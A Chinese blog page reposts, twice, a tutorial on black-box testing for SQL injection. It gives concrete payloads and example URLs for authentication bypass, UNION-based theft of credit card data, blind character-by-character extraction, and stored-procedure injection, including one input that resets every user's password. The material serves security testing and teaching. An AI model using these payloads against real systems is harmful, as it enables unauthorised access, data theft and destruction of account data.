- 浏览: 456482 次
- 性别:
- 来自: 深圳
文章分类
- 全部博客 (354)
- 面向对象分析设计/系统架构 (12)
- Mysql/Orcal11g (13)
- JSP/Java//Python/Xharbour (66)
- 软件测试 (21)
- 信息安全小知识 (1)
- Android (5)
- IT生活/哲学/兵法 (23)
- 软件工程/UML/需求分析学习与实践 (6)
- 操作系统/网络/组成原理 (9)
- 持续集成Maven/Hudson/自动化测试 (9)
- eBay /Paypal developer (10)
- Hadoop/HBase/Solr (0)
- 重构分析及其思考 (2)
- 企业架构 (7)
- 分析模式/设计模式 (4)
- SSH学习笔记 (1)
- Quartz及其JWatch监控 (0)
- Linux服务器 (0)
- ExtJs学习笔记 (1)
- 重读java编程思想 (3)
- ESB/SOA/WebServices (0)
- SpringMVC/Struts/Hibernate/Spring (7)
- Xharbour/Pelles C/ SQLite3 (0)
- Magento 电商 (1)
- Object C (1)
- note/redis (0)
- SpringBoot (0)
最新评论
-
snow8261:
太粗略了。
企业架构之数据架构 -
haithink:
面试成功没?
JVM 加载Class文件的原理及其机制 -
feisi0003731843:
不好意思我没有重启,重启后好多了,可有的地方回放还是不成功的。 ...
Selenium IDE测试ExtJs一种测试解决办法 -
feisi0003731843:
这个好像不行吧,我试过了不好使啊。还是用id来做的。不能用啊。 ...
Selenium IDE测试ExtJs一种测试解决办法 -
yuchensuifeng:
您好,静态页面是可以的,但是,我指定error-page为js ...
JSP创建错误处理页面
前一篇是关于编程防止SQL注入的文章,那么这篇就是从测试来进行测试SQL注入。
首先,看看SQL注入攻击能分为以下三种类型:
Inband: 数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上;
Out-of-band: 数据通过不同于SQL代码注入的方法获得(譬如通过邮件等)
推理: 这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。
不论是哪种SQL注入,攻击者都需要构造一个语法正确的SQL查询,如果应用程序对一个不正确的查询返回了一个错误消息,那么就很容易重新构造初始的查询语句的逻辑,进而也就能更容易的进行注入;如果应用程序隐藏了错误信息,那么攻击者就必须对查询逻辑进行反向工程,即我们所谓的“盲SQL注入”
黑盒测试及其示例:
这个测试的第一步是理解我们的应用程序在什么时候需要访问数据库,典型的需要方法数据库的时机是:
认证表单: 输入用户名和密码以检查是否有权限
搜索引擎: 提交字符串以从数据库中获取相应的记录
电子商务站点: 获取某类商品的价格等信息
作为测试人员,我们需要列对所有输入域的值可能用于查询的字段做一个表单,包括那些POST请求的隐含字段,然后截取查询语句并产生错误信息。第一个测试往往是用一个单引号“'”或者分号“;”,前者在SQL中是字符串终结符,如果应用程序没有过滤,则会产生一条错误信息;后者在SQL中是一条SQL语句的终结符,同样如果没有过滤,也会产生错误信息。
同样可用于测试的还有“--”以及SQL中的一些诸如“AND”的关键字,通常很常见的一种测试是在要求输入为数字的输入框中输入字符串。
通过上面的测试输入返回的错误信息能够让我们知道很多数据库的信息。这时候就需要“盲目SQL注入”了。注意,我们需要多所有可能存在的SQL注入漏洞的输入域进行测试,并且在,每个测试用例时只变化一个域的值,从而才能找到真正存在漏洞的输入域。
下面看看一些常用例测试的SQL注入语句。
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
我们针对上面的SQL语句分析,发现如果用下面的测试数据就能够进行SQL注入了
$username = 1'or'1'='1
$password=1'or'1'='1
看看整个SQL查询语句变成:
SELECT * FROM Users WHERE Username='1' OR '1'='1' AND Password='1'OR '1'='1'
假设参数值是通过GET方法传递到服务器的,且域名为www.example.com 那么我们的访问请求就是:
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1
对上面的SQL语句作简单分析后我们就知道由于该语句永远为真,所以肯定会返回一些数据,在这种情况下实际上并未验证用户名和密码,并且在某些系统中,用户表的第一行记录是管理员,那这样造成的后果则更为严重。
另外一个查询的例子如下:
SELECT * FROM Users WHERE((Username='$username')AND(Password=MD5('$password')))
在这个例子中,存在两个问题,一个是括号的用法,还有一个是MD5哈希函数的用法。对于第一个问题,我们很容找出缺少的右括号解决,对于第二个问题,我们可以想办法使第二个条件失效。我们在查询语句的最后加上一个注释符以表示后面的都是注释,常见的注释起始符是/*(在Oracle中是--),也就是说,我们用如下的用户名和密码:
$username =1' or '1'='1'))/*
$password = foo
那么整条SQL语句就变为:
SELECT * FROM Users WHERE(( Username='1'or '1'='1'))/*')AND (Password=MD5('$password')))
那么看看URL请求就变为:
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo
Union查询SQL注入测试
还有一种测试是利用Union的,利用Union可以连接查询,从而从其他表中得到信息,假设如下查询:
SELECT Name, Phone, Address FROM Users WHERE Id=$id
然后我们设置id的值为:
$id =1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable
那么整体的查询就变为:
SELECT Name, Phone,Address FROM Users WHERE Id=1 UNION ALL SELECT creaditCardNumber,1,1 FROM CreditCarTable
显示这就能得到所有信用卡用户的信息。
盲目SQL注入测试
在上面我们提到过盲SQL注入,即bind SQL Injection,它意味着对于某个操作我们得不到任何信息,通常这是由于程序员已经编写了特定的出错返回页面,从而隐藏了数据库结构的信息。
但利用推理方法,有时候我们能够恢复特定字段的值。这种方法通常采用一组对服务器的布尔查询,依据返回的结果来推断结果的含义。仍然延续上面的www.example.com有一个参数名为id, 那么我们输入以下url请求:
http://www.exampe.com/index.php?id=1'
显然由于语法错误,我们会得到一个预先定义好的出错页面,假设服务器上的查询语句为
SELECT field1,field2,field3 FROM Users WHERE Id='$Id'
假设我们想要的带哦用户名字段的值,那么通过一些函数,我们就可以逐字符的读取用户名的值。在这里我们使用以下的函数:
SUBSTRING(text,start,length), ASCII(char), LENGTH(text)
我们定义id为:
$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
那么最终的SQL查询语句为:
SELECT field1,field2,field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'
那么,如果在数据库中有用户名的第一字符的ASCII码为97的话,那么我们就能得到一个真值u,那么就继续寻找该用户名的下一个字符;如果没有的话,那么我们就增猜测第一个字符的ASCII码为98的用户名,这样反复下去就能判断出合法的用户名。
不过这样盲目SQL注入会要求使用大量的SQL尝试,有一些自动化的工具能够帮我们实现,SqlDumper就是这样的一种工具,对MySql数据库进行GET访问请求。
存储过程注入
如果在使用存储过程不当的时候,会造成一定的SQL注入漏洞。
以下面的SQL存储过程为例:
Create procedure user_login
@username varchar(20),
@password varchar(20) As Declare @sqlstring varchar(250)
Set @sqlstring =''
Select 1 from users
where username='+@username+'and password='+@password
exec(@sqlstring)
Go
测试的输入如下:
anyusername or 1=1'
anypassword
如果程序没有对输入进行验证,那么上面的语句就返回数据库中的一条记录
我们再看下面的一条:
Create procedure get_report @columnamelist varchar(7900) As
Declare @sqlstring varchar(8000)
Set @sqlstring = ‘
Select ‘ + @columnamelist + ‘ from ReportTable‘
exec(@sqlstring)
Go
如果测试输入是:
1 from users;update users set password='password';select *
后面显而易见,用户的所有密码都被更且得到了报表信息。
转载:http://www.51testing.com/html/40/n-201140.html
首先,看看SQL注入攻击能分为以下三种类型:
Inband: 数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上;
Out-of-band: 数据通过不同于SQL代码注入的方法获得(譬如通过邮件等)
推理: 这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。
不论是哪种SQL注入,攻击者都需要构造一个语法正确的SQL查询,如果应用程序对一个不正确的查询返回了一个错误消息,那么就很容易重新构造初始的查询语句的逻辑,进而也就能更容易的进行注入;如果应用程序隐藏了错误信息,那么攻击者就必须对查询逻辑进行反向工程,即我们所谓的“盲SQL注入”
黑盒测试及其示例:
这个测试的第一步是理解我们的应用程序在什么时候需要访问数据库,典型的需要方法数据库的时机是:
认证表单: 输入用户名和密码以检查是否有权限
搜索引擎: 提交字符串以从数据库中获取相应的记录
电子商务站点: 获取某类商品的价格等信息
作为测试人员,我们需要列对所有输入域的值可能用于查询的字段做一个表单,包括那些POST请求的隐含字段,然后截取查询语句并产生错误信息。第一个测试往往是用一个单引号“'”或者分号“;”,前者在SQL中是字符串终结符,如果应用程序没有过滤,则会产生一条错误信息;后者在SQL中是一条SQL语句的终结符,同样如果没有过滤,也会产生错误信息。
同样可用于测试的还有“--”以及SQL中的一些诸如“AND”的关键字,通常很常见的一种测试是在要求输入为数字的输入框中输入字符串。
通过上面的测试输入返回的错误信息能够让我们知道很多数据库的信息。这时候就需要“盲目SQL注入”了。注意,我们需要多所有可能存在的SQL注入漏洞的输入域进行测试,并且在,每个测试用例时只变化一个域的值,从而才能找到真正存在漏洞的输入域。
下面看看一些常用例测试的SQL注入语句。
引用
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
我们针对上面的SQL语句分析,发现如果用下面的测试数据就能够进行SQL注入了
引用
$username = 1'or'1'='1
$password=1'or'1'='1
看看整个SQL查询语句变成:
引用
SELECT * FROM Users WHERE Username='1' OR '1'='1' AND Password='1'OR '1'='1'
假设参数值是通过GET方法传递到服务器的,且域名为www.example.com 那么我们的访问请求就是:
引用
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1
对上面的SQL语句作简单分析后我们就知道由于该语句永远为真,所以肯定会返回一些数据,在这种情况下实际上并未验证用户名和密码,并且在某些系统中,用户表的第一行记录是管理员,那这样造成的后果则更为严重。
另外一个查询的例子如下:
引用
SELECT * FROM Users WHERE((Username='$username')AND(Password=MD5('$password')))
在这个例子中,存在两个问题,一个是括号的用法,还有一个是MD5哈希函数的用法。对于第一个问题,我们很容找出缺少的右括号解决,对于第二个问题,我们可以想办法使第二个条件失效。我们在查询语句的最后加上一个注释符以表示后面的都是注释,常见的注释起始符是/*(在Oracle中是--),也就是说,我们用如下的用户名和密码:
引用
$username =1' or '1'='1'))/*
$password = foo
那么整条SQL语句就变为:
引用
SELECT * FROM Users WHERE(( Username='1'or '1'='1'))/*')AND (Password=MD5('$password')))
那么看看URL请求就变为:
引用
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo
Union查询SQL注入测试
还有一种测试是利用Union的,利用Union可以连接查询,从而从其他表中得到信息,假设如下查询:
引用
SELECT Name, Phone, Address FROM Users WHERE Id=$id
然后我们设置id的值为:
引用
$id =1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable
那么整体的查询就变为:
引用
SELECT Name, Phone,Address FROM Users WHERE Id=1 UNION ALL SELECT creaditCardNumber,1,1 FROM CreditCarTable
显示这就能得到所有信用卡用户的信息。
盲目SQL注入测试
在上面我们提到过盲SQL注入,即bind SQL Injection,它意味着对于某个操作我们得不到任何信息,通常这是由于程序员已经编写了特定的出错返回页面,从而隐藏了数据库结构的信息。
但利用推理方法,有时候我们能够恢复特定字段的值。这种方法通常采用一组对服务器的布尔查询,依据返回的结果来推断结果的含义。仍然延续上面的www.example.com有一个参数名为id, 那么我们输入以下url请求:
引用
http://www.exampe.com/index.php?id=1'
显然由于语法错误,我们会得到一个预先定义好的出错页面,假设服务器上的查询语句为
引用
SELECT field1,field2,field3 FROM Users WHERE Id='$Id'
假设我们想要的带哦用户名字段的值,那么通过一些函数,我们就可以逐字符的读取用户名的值。在这里我们使用以下的函数:
引用
SUBSTRING(text,start,length), ASCII(char), LENGTH(text)
我们定义id为:
引用
$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
那么最终的SQL查询语句为:
引用
SELECT field1,field2,field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'
那么,如果在数据库中有用户名的第一字符的ASCII码为97的话,那么我们就能得到一个真值u,那么就继续寻找该用户名的下一个字符;如果没有的话,那么我们就增猜测第一个字符的ASCII码为98的用户名,这样反复下去就能判断出合法的用户名。
不过这样盲目SQL注入会要求使用大量的SQL尝试,有一些自动化的工具能够帮我们实现,SqlDumper就是这样的一种工具,对MySql数据库进行GET访问请求。
存储过程注入
如果在使用存储过程不当的时候,会造成一定的SQL注入漏洞。
以下面的SQL存储过程为例:
引用
Create procedure user_login
@username varchar(20),
@password varchar(20) As Declare @sqlstring varchar(250)
Set @sqlstring =''
Select 1 from users
where username='+@username+'and password='+@password
exec(@sqlstring)
Go
测试的输入如下:
引用
anyusername or 1=1'
anypassword
如果程序没有对输入进行验证,那么上面的语句就返回数据库中的一条记录
我们再看下面的一条:
引用
Create procedure get_report @columnamelist varchar(7900) As
Declare @sqlstring varchar(8000)
Set @sqlstring = ‘
Select ‘ + @columnamelist + ‘ from ReportTable‘
exec(@sqlstring)
Go
如果测试输入是:
引用
1 from users;update users set password='password';select *
后面显而易见,用户的所有密码都被更且得到了报表信息。
转载:http://www.51testing.com/html/40/n-201140.html
发表评论
-
YourKit Java Profiler 9.5.1 分析思考一
2010-12-10 09:06 2475以下是我对使用YoutKit 对程序分析的一些想法! 程序分 ... -
YourKit Java Profiler 9.5.1 试用总结一
2010-12-06 09:15 3760近日接到学习任务研究下YourKit来解决项目中对内存 ... -
性能测试(并发负载测试)测试分析
2010-01-04 10:47 1068声明:此文章是从网络上转载下来的,至于真实出处无法找到。 ... -
使用JUnit创建TestCase
2009-12-29 22:05 3134在学会了对单个方法、类、接口等进行测试后,接着看看这么创建 ... -
Junit---Introduce a Base Test Case
2009-12-21 20:24 1131问题: 如果有一个通用方法的集合并且希望在测试中尽可能多的 ... -
怎么提取一个测试层次结构
2009-12-18 20:29 1120问题: 如果有多个 ... -
怎么抽取一个测试模块?
2009-12-17 20:21 905[/b][b]问题: 当为一个产品类编写了好几个测试,它 ... -
Test an object that instantiates other objects
2009-12-10 20:30 988问题: 你想测试一个 ... -
Junit(Let collections compare themselves)
2009-12-08 19:26 1537问题: 你想验证容器的内容,而你第一个想到的办法是逐个 ... -
测试是否抛出正确的异常(Test throwing the right exception)
2009-12-07 21:28 5314问题: 你是否想 ... -
Test a JavaBean
2009-12-05 18:10 924问题: 如果要测试一 ... -
Test an interface(测试接口)
2009-11-30 22:52 2313问题: 你是否想过怎么测试接口,但是又苦于接口没有办法 ... -
Test a setter(Junit 测试setter方法)
2009-11-29 14:27 1809问题: setter方法怎 ... -
Junit Test a getter
2009-11-28 12:16 1103问题: 怎么测试一个对象的get方法?怎么判断哪些需要 ... -
Junit测试构造函数
2009-11-28 00:22 5112构造函数对于测试者 ... -
测试没有返回值的方法
2009-11-26 22:28 7142在使用JUnit进行单元测试的时候,常会碰到返回值为viod的 ... -
JUnit 测试学习笔记二
2009-11-16 22:43 1461现在看看JUnit怎么测试equals()方法 首先分析下e ... -
JUnit测试学习笔记一
2009-11-09 22:25 2055在软件测试中,最基 ... -
何为软件可测试
2009-10-26 11:04 815软件工程发展了二十多 ... -
自动化测试
2009-10-13 09:34 1060关于自动化测试现在 ...
相关推荐
在本完全篇中,我们将深入探讨SQL注入的基本原理、常见手法、防范措施以及如何进行安全编码。 一、SQL注入基本概念 SQL注入是攻击者通过在输入字段中插入恶意的SQL代码,使得原本的数据库查询语句发生变化,从而...
在开发过程中,可以使用工具进行SQL注入测试,如Burp Suite、Nessus、SQLMap等,它们能帮助开发者发现潜在的注入漏洞。同时,代码审查工具如SonarQube也可以在代码级别检测SQL注入问题。 总结,SQL注入是一种常见的...
5. **2007-测试和比较Web漏洞扫描工具对SQL注入的抵抗力**(2007-Testing and comparing web vulnerability scanning tools for SQL injection.pdf):这是一篇关于评估不同Web漏洞扫描工具在检测SQL注入方面的性能...
《SQL注入天书-ASP注入漏洞全接触》是一本深入探讨SQL注入攻击的书籍,主要针对ASP编程环境下的漏洞利用。SQL注入是一种常见的网络安全威胁,...对于任何涉及Web开发的人来说,理解和防范SQL注入都是不可或缺的知识点。
在IT安全领域,SQL注入是一种常见的攻击手段,它利用了应用程序对用户输入处理不当的漏洞。...记住,安全是每个IT从业者必须关注的重要课题,尤其是在面对用户数据和隐私时,更应严格防范SQL注入等威胁。
#### (一) SQL注入漏洞全接触——入门篇 **1. SQL注入的概念** 随着互联网技术的不断发展,尤其是B/S模式应用开发的日益普及,越来越多的应用程序采用这种方式来实现前端与后端的交互。然而,由于这一领域的门槛...
判断SQL注入可能性的正确方法是通过1=1和1=2的测试。正常情况下,如果①和②显示相同,而③显示错误信息(如BOF、EOF、找不到记录或内容为空),则可能存在注入点。这是因为1=1总是真,所以如果注入成功,程序应能...
文章首先分析了Web应用程序的基本运行机理以及SQL注入攻击的原理,接着通过实例详细介绍了Oracle数据库中SQL注入的过程,并在最后提出了一套综合性的防范措施,包括执行渗透测试、隐藏敏感提示信息、执行参数化查询...
本篇文章将深入探讨如何解决SQL注入问题,特别是针对C#编程环境,但Java开发者也可以从中获得灵感。 首先,我们需要理解SQL注入的基本原理。当用户输入的数据直接拼接到SQL查询语句中时,攻击者可以通过构造特殊的...
本文通过实验性的测试,证明了Base64编码在防范SQL注入攻击方面取得比较理想的效果。但是,使用Base64编码也有其自身的局限性,例如增加了服务器的计算负担,且对一些直接执行数据操作的攻击仍然有一定的风险。 ...
《SQL注入漏洞多等级检测方法研究》这篇论文深入探讨了SQL注入漏洞的检测方法,重点关注了如何通过多级检测来提升安全防护效率。SQL注入是一种常见的网络安全威胁,它利用应用程序处理用户输入数据时的疏忽,构造...
研究过程中,作者强调了SQL注入攻击对数据库安全的威胁,并根据实际的测试环境和攻击案例,提出了几种SQL注入攻击的防范方法。这些防范措施主要集中在提高数据库系统的安全性,例如,使用参数化查询,对输入进行严格...
防范SQL注入的关键在于遵循以下几个原则: 1. 使用预编译的SQL语句(如PHP的PDO或MySQLi的预处理语句),它们能有效地防止注入。 2. 对用户输入进行严格的验证和过滤,确保数据格式正确且不包含有害字符。 3. 限制...
本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 首先,让我们了解SQL注入的基本原理。当用户输入的数据未经充分过滤或转义就被直接拼接到SQL查询语句中,攻击者可以通过构造特殊的输入来执行...
在本篇文章中,我们将深入探讨SQL注入的三种常见形式及其防范策略。 1. **模糊查询中的SQL注入** 模糊查询通常涉及到使用通配符(如`%`)来查找不完全匹配的值。攻击者可能会在搜索框中输入带有恶意SQL代码的字符...
这篇笔记可能详尽地介绍了SQL注入的基本原理、常见手法以及防御策略。以下是基于这个主题的一些关键知识点: 1. **SQL注入简介**:SQL注入是一种常见的Web应用安全漏洞,攻击者通过输入特定的SQL代码,使应用程序...
同时,进行安全测试,包括使用SQL注入工具模拟攻击,以检测任何潜在漏洞。 5. **持续更新和维护**:保持数据库系统和应用程序的更新,修复已知的安全漏洞,及时应对新的威胁。 总之,防止SQL注入需要多层面的防御...
五、防范SQL注入 防止SQL注入的关键在于对用户输入进行严格验证和转义。使用预编译的SQL语句(如PHP的PDO或MySQLi的预处理语句)、参数化查询、输入过滤和转义,以及限制数据库用户的权限,都是有效的防御手段。 ...